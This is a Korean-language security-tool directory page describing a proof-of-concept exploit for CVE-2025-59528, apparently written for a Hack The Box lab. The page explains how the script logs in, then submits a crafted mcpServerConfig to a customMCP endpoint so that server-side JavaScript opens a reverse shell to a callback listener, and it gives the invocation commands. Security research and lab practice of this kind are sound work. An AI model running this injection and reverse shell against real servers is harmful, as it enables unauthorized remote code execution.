Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59528-PoC — HTB의 Silentium 머신에서 원격 코드 실행을 달성하는 데 사용되는 CVE-2025-59528용 PoC | Kitploit
도구/GitHubGitHub/loaxert/cve-2025-59528-poc
ExploitationWeb Application ExploitationAPI Security TestingPenetration TestingLearning & EducationPayload Development
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

HTB의 Silentium 머신에서 원격 코드 실행을 달성하는 데 사용되는 CVE-2025-59528용 PoC

저장소 보기
171개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-59528 교육용 PoC

교육용으로만 사용하십시오. 이 프로젝트는 통제된 보안 연구, 교실 실습, 격리된 연구실 환경에서의 인가된 테스트를 대상으로 합니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템, 네트워크, 애플리케이션 또는 계정에 이를 사용하지 마십시오.

이 PoC가 시연하는 내용

이 proof of concept은 부적절하게 처리된 mcpServerConfig 값이 customMCP 노드 로드 기능을 통해 서버 측 JavaScript 평가 및 명령 실행을 허용할 수 있음을 시연합니다.

이 스크립트는 두 가지 인증 방식을 지원합니다:

  • 이메일/비밀번호: 애플리케이션의 로그인 엔드포인트를 통해 인증하고 반환된 세션 쿠키를 재사용합니다.
  • Bearer 토큰: Authorization 헤더에 API 키를 전송합니다.

인증 후, 스크립트는 /api/v1/node-load-method/customMCP에 조작된 구성을 제출합니다. 페이로드는 Node.js 자식 프로세스(child-process) 기능을 사용하여 셸 명령을 실행하고 연구자가 제어하는 리스너로 다시 연결합니다. 이 동작은 인가된 연구실 환경에서 잠재적 영향을 시연하기 위한 목적으로만 포함되었습니다.

요구 사항

  • Python 3.
  • requests 패키지.

다음과 같이 의존성을 설치합니다:

root@kitploit:~
python3 -m pip install requests

사용법

스크립트를 CVE-2025-59528.py로 저장합니다.

이메일 및 비밀번호 모드

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

문서화 전용 값이 포함된 예시:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

Bearer 토큰 모드

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

문서화 전용 값이 포함된 예시:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

스크립트는 다음 애플리케이션 라우트를 사용할 수 있어야 합니다:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

현재 스크립트는 http:// URL을 구성합니다. TLS가 필요한 연구실 배포 환경을 테스트할 때는 HTTPS를 사용하도록 구현을 업데이트하십시오.

코드 동작 방식

  1. main()은 명령줄 인수 개수를 검증하고 인증 모드를 선택합니다.
  2. login()은 제공된 자격 증명을 로그인 엔드포인트로 전송합니다.
  3. tokens()는 Set-Cookie 응답 헤더에서 세션 값을 추출합니다.
  4. shell()은 인증된 요청을 구성하고 조작된 mcpServerConfig 값을 제출합니다.
  5. bearer()는 세션 쿠키 대신 Bearer 토큰을 사용하여 동일한 요청을 수행합니다.
  6. 응답 본문이 출력되어 연구자가 애플리케이션 및 서버 로그와 결과를 대조할 수 있습니다.
도구 다운로드